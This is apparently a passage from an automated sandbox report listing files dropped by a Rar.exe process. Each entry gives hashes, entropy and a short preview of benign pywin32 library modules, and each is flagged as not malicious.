                                                                                                                                                                                      SHA1:3CF6B740CEF32D322F474FC2F0CF2B90031531B2
                                                                                                                                                                                      SHA-256:7DC59BBF74413E8951D199A9DE1B7DDAFE027FB1244C813F2DBD3DF3841AE80E
                                                                                                                                                                                      SHA-512:2AA93F6E05ABBA165CFD7F72E8ADC5DC0C7FFD7FD3C5AC8F762E5D6C2F40FA619469A9757185163208B7594869FC7D2755026D8AECE5AFCBB6BAD4F4C1A746E0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from lmaccess.h..# Included from lmcons.h.CNLEN = 15.LM20_CNLEN = 15.DNLEN = CNLEN.LM20_DNLEN = LM20_CNLEN.UNCLEN = CNLEN + 2.LM20_UNCLEN = LM20_CNLEN + 2.NNLEN = 80.LM20_NNLEN = 12.RMLEN = UNCLEN + 1 + NNLEN.LM20_RMLEN = LM20_UNCLEN + 1 + LM20_NNLEN.SNLEN = 80.LM20_SNLEN = 15.STXTLEN = 256.LM20_STXTLEN = 63.PATHLEN = 256.LM20_PATHLEN = 256.DEVLEN = 80.LM20_DEVLEN = 8.EVLEN = 16.UNLEN = 256.LM20_UNLEN = 20.GNLEN = UNLEN.LM20_GNLEN = LM20_UNLEN.PWLEN = 256.LM20_PWLEN = 14.SHPWLEN = 8.CLTYPE_LEN = 12.MAXCOMMENTSZ = 256.LM20_MAXCOMMENTSZ = 48.QNLEN = NNLEN.LM20_QNLEN = LM20_NNLEN.ALERTSZ = 128.NETBIOS_NAME_LEN = 16.CRYPT_KEY_LEN = 7.CRYPT_TXT_LEN = 8.ENCRYPTED_PWLEN = 16.SESSION_PWLEN = 24.SESSION_CRYPT_KLEN = 21.PARMNUM_ALL = 0.PARM_ERROR_NONE = 0.PARMNUM_BASE_INFOLEVEL = 1000.NULL = 0.PLATFORM_ID_DOS = 300.PLATFORM_ID_OS2 = 400.PLATFORM_ID_NT = 500.PLATFORM_ID_OSF = 600.PLATFORM_ID_VMS = 700.MAX_LANMAN_MESSAGE_ID = 5799.UF_SCRIPT = 1.UF_ACCOUNTDISABLE = 2.UF_HOMEDIR_
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23345
                                                                                                                                                                                      Entropy (8bit):4.411538185872905
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:+FzU1rmtmzoAVnZj1lkYZwErcrxEJ4zU4CrML/nZj7mnRJMhA/NL5YTYA5x+W:iz0mozoAFZ+rxC444Cr8/Zg7BNL5YJ1
                                                                                                                                                                                      MD5:BF0D2114EDDEEBD1CE68A9EAE89B816F
                                                                                                                                                                                      SHA1:E1A693DCA326553D9C721EF87B989EC2F7F03855
                                                                                                                                                                                      SHA-256:B0003F4A62C0423ED5FCE784CC2DAFD46D4326FF3779C38CC6B41514785DAAA2
                                                                                                                                                                                      SHA-512:A1898D94EA296110A1CF036863F3E0DF30C8570466ACDC32058FE20A6DD0091ECE254B6FE9CB290364564A5AF263DA7BF79061285AABA8D5A32728D0C8DC4BE3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Performance Data Helper (PDH) Query Classes..Wrapper classes for end-users and high-level access to the PDH query.mechanisms. PDH is a win32-specific mechanism for accessing the.performance data made available by the system. The Python for Windows.PDH module does not implement the "Registry" interface, implementing.the more straightforward Query-based mechanism...The basic idea of a PDH Query is an object which can query the system.about the status of any number of "counters." The counters are paths.to a particular piece of performance data. For instance, the path .'\\Memory\\Available Bytes' describes just about exactly what it says.it does, the amount of free memory on the default computer expressed .in Bytes. These paths can be considerably more complex than this, .but part of the point of this wrapper module is to hide that.complexity from the end-user/programmer...EXAMPLE: A more complex Path..'\\\\RAISTLIN\\PhysicalDisk(_Total)\\Avg. Disk Bytes/Read'..Raistlin --> Comput
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7572
                                                                                                                                                                                      Entropy (8bit):4.760002873265964
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:rzrV6tcGJwM6z1h5q6wq+zoDz7iHEQER6qkYdWXxQeio:rzOwv9qICqbox
                                                                                                                                                                                      MD5:8AD62CBBD2071246ABA788230750686B
                                                                                                                                                                                      SHA1:23BBB6B4B02A5119B2B076D0C79852F54F264A79
                                                                                                                                                                                      SHA-256:306381F35E30A3864D0C8B7CE4A643DB6459B46A4B2ACDBDDF3F51F97236F280
                                                                                                                                                                                      SHA-512:F3083469BCD5C3A05FB25F4D313DD9C9652FC7929AFC27E4C0CB7AD55FB1A8EB314C60300153FA3FBD1FBE3A37B4826B0FF68224F8CA5DD26BC1FBA7D966E2E5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utilities for the win32 Performance Data Helper module..Example:. To get a single bit of data:. >>> import win32pdhutil. >>> win32pdhutil.GetPerformanceAttributes("Memory", "Available Bytes"). 6053888. >>> win32pdhutil.FindPerformanceAttributesByName("python", counter="Virtual Bytes"). [22278144].. First example returns data which is not associated with any specific instance... The second example reads data for a specific instance - hence the list return -. it would return one result for each instance of Python running... In general, it can be tricky finding exactly the "name" of the data you wish to query.. Although you can use <om win32pdh.EnumObjectItems>(None,None,(eg)"Memory", -1) to do this,. the easiest way is often to simply use PerfMon to find out the names.."""..import time..import win32pdh..error = win32pdh.error..# Handle some louserzation issues..# see http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q287/1/5
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21621
                                                                                                                                                                                      Entropy (8bit):4.345741275259594
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:14EBSW45wnsBm90TycgCgHv+gDaFWz08oQdcqlsOaCZUCrBX0+ODX5UZTQdNH6kF:14EBkbg0T1gCgHk6cqqOaeUCJZ0bH6kF
                                                                                                                                                                                      MD5:6E9D68C5DA50B72139D96FF891CD4721
                                                                                                                                                                                      SHA1:D062B14C6573976B48B9EE109FE1E9E25D0B49F1
                                                                                                                                                                                      SHA-256:0800FE2913F79F7FD01B4E6ECC35890AE1E790C3B3BB822DAF5E683D783A3D25
                                                                                                                                                                                      SHA-512:34E8525684978447423BA9E40253F1603D846E657DD4F27707BA48C7A56AAEEC0ABB9E49E9948C94EBEE7437C371E10FF8354F00C2C2E2A4B9B2BB34200EDD51
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Windows dialog .RC file parser, by Adam Walker...# This module was adapted from the spambayes project, and is Copyright.# 2003/2004 The Python Software Foundation and is covered by the Python.# Software Foundation license..""".This is a parser for Windows .rc files, which are text files which define.dialogs and other Windows UI resources..""".__author__ = "Adam Walker".__version__ = "0.11"..import os.import pprint.import shlex.import stat.import sys..import commctrl.import win32con.._controlMap = {. "DEFPUSHBUTTON": 0x80,. "PUSHBUTTON": 0x80,. "Button": 0x80,. "GROUPBOX": 0x80,. "Static": 0x82,. "CTEXT": 0x82,. "RTEXT": 0x82,. "LTEXT": 0x82,. "LISTBOX": 0x83,. "SCROLLBAR": 0x84,. "COMBOBOX": 0x85,. "EDITTEXT": 0x81,. "ICON": 0x82,. "RICHEDIT": "RichEdit20A",.}..# These are "default styles" for certain controls - ie, Visual Studio assumes.# the styles will be applied, and emits a "NOT {STYLE_NAME}" if it is to be.# disabled. These defaults ha
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37862
                                                                                                                                                                                      Entropy (8bit):4.614779913776034
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:AO8FXlkGUR9NrtkfDzwVfA4wLI9w+M8M/ZwX6x+czhipBbfwT9aFFep:AO6bI9NrQI9VMn/ZwX6x+czMpBbfi
                                                                                                                                                                                      MD5:A2763C3261E20DD075A58806FC70F5D6
                                                                                                                                                                                      SHA1:EAA742D5CF6A52C4FF73FE918576BC833B5773F4
                                                                                                                                                                                      SHA-256:5AEC1FB03072ADA28FB7E6A481BAB681EF86D6A8B5655D42EC2025480D192629
                                                                                                                                                                                      SHA-512:4C721D6130027E5EBE64A8DADA7694B3351C43468DD14401290073D3B28FBA0E4538FD8BE94C9A92593AD32E47E995BB642AEE4D28019EDC1D4C81ADEEAF04AA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# General purpose service utilities, both for standard Python scripts,.# and for for Python programs which run as services....#.# Note that most utility functions here will raise win32api.error's.# (which is win32service.error, pywintypes.error, etc).# when things go wrong - eg, not enough permissions to hit the.# registry etc...import importlib.import os.import sys.import warnings..import pywintypes.import win32api.import win32con.import win32service.import winerror.._d = "_d" if "_d.pyd" in importlib.machinery.EXTENSION_SUFFIXES else "".error = RuntimeError...# Returns the full path to an executable for hosting a Python service - typically.# 'pythonservice.exe'.# * If you pass a param and it exists as a file, you'll get the abs path back.# * Otherwise we'll use the param instead of 'pythonservice.exe', and we will.# look for it..def LocatePythonServiceExe(exe=None):. if not exe and hasattr(sys, "frozen"):. # If py2exe etc calls this with no exe, default is current exe,.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34707
                                                                                                                                                                                      Entropy (8bit):4.807361610549798
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:tPJIPrdvdG2k1yjOW8/S8qwAKUQM/pSfWk9D:tPJIBk15W8/SzaWk9D
                                                                                                                                                                                      MD5:718FFB8E2DE16CC50F85AE5A97357C1E
                                                                                                                                                                                      SHA1:0C525852741BB3C79217BB8BE74B70BF961BA6CE
                                                                                                                                                                                      SHA-256:0B841E5261A6631A779AADC686380CD950687BCFCA5DEBB3811F1239B0D46215
                                                                                                                                                                                      SHA-512:0649B8EAF331CD2A8E126614CF2C3F4C19659E0E18710AB945CD118D257F11FAF10745CACC477CA684576D27FB32D6ABE850645483E970BDA9A87ABFF3BA968B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: UTF-8 -*-..""".win32timezone:. Module for handling datetime.tzinfo time zones using the windows.registry for time zone information. The time zone names are dependent.on the registry entries defined by the operating system... This module may be tested using the doctest module... Written by Jason R. Coombs (jaraco@jaraco.com).. Copyright . 2003-2012.. All Rights Reserved... This module is licenced for use in Mark Hammond's pywin32.library under the same terms as the pywin32 library... To use this time zone module with the datetime module, simply pass.the TimeZoneInfo object to the datetime constructor. For example,..>>> import win32timezone, datetime.>>> assert 'Mountain Standard Time' in win32timezone.TimeZoneInfo.get_sorted_time_zone_names().>>> MST = win32timezone.TimeZoneInfo('Mountain Standard Time').>>> now = datetime.datetime.now(MST).. The now object is now a time-zone aware object, and daylight savings-.aware methods may be called on it..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1584
                                                                                                                                                                                      Entropy (8bit):4.654992084520462
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:aNWT3mYj2PxhrzR5jhWEhEJA755kzfs8R6tTw6mrHcBkAV6vbdw:oWbUh3R55Eqk1CTw6pXVAy
                                                                                                                                                                                      MD5:BDFB78DE5F5D6078A8BD64C4F657E8C7
                                                                                                                                                                                      SHA1:866AA96F01D696B9C372CD553DD450D757675E6B
                                                                                                                                                                                      SHA-256:0F10F3808D3A2A2913D6AD0F2FE7533CE0FA97C9DD9B076ECDA74746D3B14A61
                                                                                                                                                                                      SHA-512:B4E95B9891C3A466A1F06587C850AE26F4E15F4FBA238AB384217F239AAFD4F6E628B120343271C794B8E15EAE0E90864ADE9540DB0E82CA3176BA2B12F78F4E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is a helper for the win32trace module..# If imported from a normal Python program, it sets up sys.stdout and sys.stderr.# so output goes to the collector...# If run from the command line, it creates a collector loop...# Eg:.# C:>start win32traceutil.py (or python.exe win32traceutil.py).# will start a process with a (pretty much) blank screen..#.# then, switch to a DOS prompt, and type:.# C:>python.exe.# Python 1.4 etc....# >>> import win32traceutil.# Redirecting output to win32trace remote collector.# >>> print "Hello".# >>>.# And the output will appear in the first collector process...# Note - the client or the collector can be started first..# There is a 0x20000 byte buffer. If this gets full, it is reset, and new.# output appended from the start...import win32trace...def RunAsCollector():. import sys.. try:. import win32api.. win32api.SetConsoleTitle("Python Trace Collector"). except:. pass # Oh well!. win32trace.InitRead(). print("Collec
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7181
                                                                                                                                                                                      Entropy (8bit):4.8562430886724055
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:2iXBeK46B+reiXzazgvCzzLGz/cqXsvAzSKSi+0NYBQL2wTekW6FRJVt6fgvokMH:2iXB3Lzw9WMRJ9Q3
                                                                                                                                                                                      MD5:7388BE0EC0F22D309FD05084BEA46732
                                                                                                                                                                                      SHA1:C1344C0077A437F903090F9ACEFD4D023490F2E6
                                                                                                                                                                                      SHA-256:59028FB43A41D5F1A37425AA91ECE10D9A3336494E9FC12A85456213EC157524
                                                                                                                                                                                      SHA-512:542855F86F989D8DC7EA2F9F5B56BB2D2DC9E137B14AFC79387AA7B16CDA7C213FBBDE125E1C2F81FFCDBCCCCD19DD009DB3D6F0D9F8C531CD5EF32E5249CDD9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Stamp a Win32 binary with version information.."""..import glob.import optparse.import os.import struct.import sys..from win32api import BeginUpdateResource, EndUpdateResource, UpdateResource..VS_FFI_SIGNATURE = -17890115 # 0xFEEF04BD.VS_FFI_STRUCVERSION = 0x00010000.VS_FFI_FILEFLAGSMASK = 0x0000003F.VOS_NT_WINDOWS32 = 0x00040004..null_byte = "\0".encode("ascii") # str in py2k, bytes in py3k...#.# Set VS_FF_PRERELEASE and DEBUG if Debug.#.def file_flags(debug):. if debug:. return 3 # VS_FF_DEBUG | VS_FF_PRERELEASE. return 0...def file_type(is_dll):. if is_dll:. return 2 # VFT_DLL. return 1 # VFT_APP...def VS_FIXEDFILEINFO(maj, min, sub, build, debug=0, is_dll=1):. return struct.pack(. "lllllllllllll",. VS_FFI_SIGNATURE, # dwSignature. VS_FFI_STRUCVERSION, # dwStrucVersion. (maj << 16) | min, # dwFileVersionMS. (sub << 16) | build, # dwFileVersionLS. (maj << 16) | min, # dwProductVersionMS. (sub
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):101476
                                                                                                                                                                                      Entropy (8bit):4.77819887256081
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:4t1wPaKFhrJ8Z4URAd4X918GSpoJVIgF4QNAOeETca2AU/bZVQOtdIiFns00yP8X:o0P7Y9uNpcVIgF4KRq9FwO8ELE0g1OC
                                                                                                                                                                                      MD5:3E6BCC747E8DBB2605E4F71B359F574A
                                                                                                                                                                                      SHA1:00FCA4E9E1878BC43471E61D37829FA8B1B7E419
                                                                                                                                                                                      SHA-256:BDEFDD1C793B377C8712924EC2E9DC1DD36CF4D0231C42A0754F4800C4C33CE4
                                                                                                                                                                                      SHA-512:D4AB8EE26C86C517118C58542B559233B43C68E3860580B65662BC403FD2048827B67038DA536F49EDC5A09880988914A6EA6B7EB50509F74278FA072173842B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Error related constants for win32..Generated by h2py from winerror.h.""".# Few extras added manually....TRUST_E_PROVIDER_UNKNOWN = -2146762751.TRUST_E_ACTION_UNKNOWN = -2146762750.TRUST_E_SUBJECT_FORM_UNKNOWN = -2146762749.TRUST_E_SUBJECT_NOT_TRUSTED = -2146762748.# up to here.....FACILITY_WINRM = 51.FACILITY_WINDOWSUPDATE = 36.FACILITY_WINDOWS_DEFENDER = 80.FACILITY_WINDOWS_CE = 24.FACILITY_WINDOWS = 8.FACILITY_URT = 19.FACILITY_UMI = 22.FACILITY_TPM_SOFTWARE = 41.FACILITY_TPM_SERVICES = 40.FACILITY_SXS = 23.FACILITY_STORAGE = 3.FACILITY_STATE_MANAGEMENT = 34.FACILITY_SSPI = 9.FACILITY_SCARD = 16.FACILITY_SHELL = 39.FACILITY_SETUPAPI = 15.FACILITY_SECURITY = 9.FACILITY_RPC = 1.FACILITY_PLA = 48.FACILITY_WIN32 = 7.FACILITY_CONTROL = 10.FACILITY_NULL = 0.FACILITY_NDIS = 52.FACILITY_METADIRECTORY = 35.FACILITY_MSMQ = 14.FACILITY_MEDIASERVER = 13.FACILITY_INTERNET = 12.FACILITY_ITF = 4.FACILITY_USERMODE_HYPERVISOR = 53.FACILITY_HTTP = 25.FACILITY_GRAPHICS = 38.FACILITY_FWP = 50.FACILIT
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):35375
                                                                                                                                                                                      Entropy (8bit):4.947059805776436
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:q3w3vnh68AVm2oVvU7O/0iFvQW3mSnvmlqqoKzl306El/Bs:qIvn5GOYiFj0qyu6Ec
                                                                                                                                                                                      MD5:3DF6D6E817826DB59BC39A28767FBF17
                                                                                                                                                                                      SHA1:C4A306CFBDE9C4A7AA9D6EC31A7F5DF460AF3712
                                                                                                                                                                                      SHA-256:96315AD778ABB36647DFA50E972327BF3CE302E406BA82A0BBCB1468F0B0B724
                                                                                                                                                                                      SHA-512:62AF06B18236700DE5F72170E98C689D66DEBA7DC782C2E3BFBBF39DF3CC2249F14DD5A69D3A1BC68CB27C17A5DE2234BA09EB5F5FA19A77E7DECC736490D3D6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:## flags, enums, guids used with DeviceIoControl from WinIoCtl.h..import pywintypes.from ntsecuritycon import FILE_READ_DATA, FILE_WRITE_DATA...def CTL_CODE(DeviceType, Function, Method, Access):. return (DeviceType << 16) | (Access << 14) | (Function << 2) | Method...def DEVICE_TYPE_FROM_CTL_CODE(ctrlCode):. return (ctrlCode & 0xFFFF0000) >> 16...FILE_DEVICE_BEEP = 0x00000001.FILE_DEVICE_CD_ROM = 0x00000002.FILE_DEVICE_CD_ROM_FILE_SYSTEM = 0x00000003.FILE_DEVICE_CONTROLLER = 0x00000004.FILE_DEVICE_DATALINK = 0x00000005.FILE_DEVICE_DFS = 0x00000006.FILE_DEVICE_DISK = 0x00000007.FILE_DEVICE_DISK_FILE_SYSTEM = 0x00000008.FILE_DEVICE_FILE_SYSTEM = 0x00000009.FILE_DEVICE_INPORT_PORT = 0x0000000A.FILE_DEVICE_KEYBOARD = 0x0000000B.FILE_DEVICE_MAILSLOT = 0x0000000C.FILE_DEVICE_MIDI_IN = 0x0000000D.FILE_DEVICE_MIDI_OUT = 0x0000000E.FILE_DEVICE_MOUSE = 0x0000000F.FILE_DEVICE_MULTI_UNC_PROVIDER = 0x00000010.FILE_DEVICE_NAMED_PIPE = 0x00000011.FILE_DEVICE_NETWORK = 0x00000012.FILE_DEVICE_NE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37443
                                                                                                                                                                                      Entropy (8bit):5.062040837597238
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:M1R3blbtAU2MXle367ilbqqHGDyACQINpB1NzGU9z+c1m/XcSe:yoMXl/iRqoGI9z+cMcSe
                                                                                                                                                                                      MD5:B1462067D46C806885EDDCE722EC69E4
                                                                                                                                                                                      SHA1:7F604203D100378E7AE54333B44CA4163A527D5E
                                                                                                                                                                                      SHA-256:F2A893A055E72F1A21474A2D0AF2847874D241DCC6EE2F11F0213CA89F2B3328
                                                                                                                                                                                      SHA-512:5FA6A9004AA50EDB8081AB33048D03E905DAB785946830F22E0F3472D45728C54B5879F859E4040766CADB784BE5EC89CEF80D4E0F9B59FE21C3CA38494EF81C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from \mssdk\include\winnt.h..APPLICATION_ERROR_MASK = 536870912.ERROR_SEVERITY_SUCCESS = 0.ERROR_SEVERITY_INFORMATIONAL = 1073741824.ERROR_SEVERITY_WARNING = -2147483648.ERROR_SEVERITY_ERROR = -1073741824.MINCHAR = 128.MAXCHAR = 127.MINSHORT = 32768.MAXSHORT = 32767.MINLONG = -2147483648.MAXLONG = 2147483647.MAXBYTE = 255.MAXWORD = 65535.MAXDWORD = -1.LANG_NEUTRAL = 0.LANG_AFRIKAANS = 54.LANG_ALBANIAN = 28.LANG_ARABIC = 1.LANG_BASQUE = 45.LANG_BELARUSIAN = 35.LANG_BULGARIAN = 2.LANG_CATALAN = 3.LANG_CHINESE = 4.LANG_CROATIAN = 26.LANG_CZECH = 5.LANG_DANISH = 6.LANG_DUTCH = 19.LANG_ENGLISH = 9.LANG_ESTONIAN = 37.LANG_FAEROESE = 56.LANG_FARSI = 41.LANG_FINNISH = 11.LANG_FRENCH = 12.LANG_GERMAN = 7.LANG_GREEK = 8.LANG_HEBREW = 13.LANG_HINDI = 57.LANG_HUNGARIAN = 14.LANG_ICELANDIC = 15.LANG_INDONESIAN = 33.LANG_ITALIAN = 16.LANG_JAPANESE = 17.LANG_KOREAN = 18.LANG_LATVIAN = 38.LANG_LITHUANIAN = 39.LANG_MACEDONIAN = 47.LANG_MALAY = 62.LANG_NORWEGIAN = 20.LANG_POLISH = 21
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5911
                                                                                                                                                                                      Entropy (8bit):4.465756105097943
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:7PZRsJXrfE8ya78yd8ysr8yH78ywZSRhORN6y/o8yJ078Tm6Pt1R7ny+7nTS1pQJ:lRsJrfEG7BYrD7tM0q7W7x7ka1+YSwSm
                                                                                                                                                                                      MD5:00BBE05FD99166836678F90A9911A478
                                                                                                                                                                                      SHA1:EF0A2B4DC2AC55643E7F2326942612586D653F46
                                                                                                                                                                                      SHA-256:A787E682F6200CF1F0DCCBD48E90F758B969C95DBFEB5430651AC41E1658FE06
                                                                                                                                                                                      SHA-512:6ED6367F7C02805991E56F2BEB88928A9A34EB02ABBFA4E6C4AB189F516CC053C9C740B9C1D8C0B828E4574924141888A66AB46DFF7399869F19525325E837ED
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from winperf.h.PERF_DATA_VERSION = 1.PERF_DATA_REVISION = 1.PERF_NO_INSTANCES = -1.PERF_SIZE_DWORD = 0x00000000.PERF_SIZE_LARGE = 0x00000100.PERF_SIZE_ZERO = 0x00000200.PERF_SIZE_VARIABLE_LEN = 0x00000300.PERF_TYPE_NUMBER = 0x00000000.PERF_TYPE_COUNTER = 0x00000400.PERF_TYPE_TEXT = 0x00000800.PERF_TYPE_ZERO = 0x00000C00.PERF_NUMBER_HEX = 0x00000000.PERF_NUMBER_DECIMAL = 0x00010000.PERF_NUMBER_DEC_1000 = 0x00020000.PERF_COUNTER_VALUE = 0x00000000.PERF_COUNTER_RATE = 0x00010000.PERF_COUNTER_FRACTION = 0x00020000.PERF_COUNTER_BASE = 0x00030000.PERF_COUNTER_ELAPSED = 0x00040000.PERF_COUNTER_QUEUELEN = 0x00050000.PERF_COUNTER_HISTOGRAM = 0x00060000.PERF_TEXT_UNICODE = 0x00000000.PERF_TEXT_ASCII = 0x00010000.PERF_TIMER_TICK = 0x00000000.PERF_TIMER_100NS = 0x00100000.PERF_OBJECT_TIMER = 0x00200000.PERF_DELTA_COUNTER = 0x00400000.PERF_DELTA_BASE = 0x00800000.PERF_INVERSE_COUNTER = 0x01000000.PERF_MULTI_COUNTER = 0x02000000.PERF_DISPLAY_NO_SUFFIX = 0x00000000.PERF_DISPLAY_PE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):254
                                                                                                                                                                                      Entropy (8bit):4.614942657274806
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:svKVMrg55fqwkAsQPlRGGR0khyRCuXp3FxXFZF/+/z5GEH0LJln:iKV3v7zN1R0khykuZnhW/MEHyJl
                                                                                                                                                                                      MD5:AFA2616539DD48A88AA2E7071342A977
                                                                                                                                                                                      SHA1:B54B743581965E75D2AC912AD4AC450E0C3164D4
                                                                                                                                                                                      SHA-256:11B834A54993AE29F7334391BDF7B05F3731A99180D4B376D0ED0ABB3E07B8DF
                                                                                                                                                                                      SHA-512:93E9916B9729ECED9ED6409945BD7E39BA644EFB08C3D21674ECB55D316EABE3AA025E1384BA3D05722F123A99A4A155E612377E3F66376FCABAE66AEF56E4DA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A useful wrapper around the "_winxptheme" module...Originally used when we couldn't be sure Windows XP apis were going to.be available. In 2022, it's safe to assume they are, so this is just a wrapper.around _winxptheme..""".from _winxptheme import *.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:current ar archive
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):105046
                                                                                                                                                                                      Entropy (8bit):5.468277487512252
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:Yo1NEllyTdHG0maB6OHP78QiCTWsAO+GmBM:5TdHF6S8Ab+G
                                                                                                                                                                                      MD5:19F6BCA56A9CF416E09E06C744F0C0E7
                                                                                                                                                                                      SHA1:352E73AF0A6662D367BDCC203132E5CA32BECD30
                                                                                                                                                                                      SHA-256:BE8CEACBE3565722C61FB025EF609A5CDC732EEC4448653F5B4107DF1F1487DF
                                                                                                                                                                                      SHA-512:23D00A61EDF83C115BEF7B014B02309BD0174A802BEAA6CBAB80D8F876198D64AED693D6E6752145D3E231869FE4E77D01EDB6CC4B4B5DB3B91003B69985DDAB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:!<arch>./ -1 0 29986 `....O...T.....................*$.......b..t...t....X...X.........0...0..,:..,:..,...,...1...1....................J...J...........h...h...z...z...........P...P........................... ... ...X...X..................-x..-x..(v..(v..$...$...?...?...:...:...........m...m....B...B...........................$...$...r...r........................................................................$...$.......................#...#....f...f...........<...<...................8...8...........H...H...................@...@...................Z...Z...........................................6...6...f...&..~...+...X~..X~..B&..B&...@...@..................u^..u^..........."..."...&...&.........@...@..zr..zr..........{...{...........y...y....,...........6...6..R...R...ZH..ZH..D...D...u...u...........t@..t@..........s...s....|...|...................X...X...........................................p...p...........D...D..........{...{.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17920
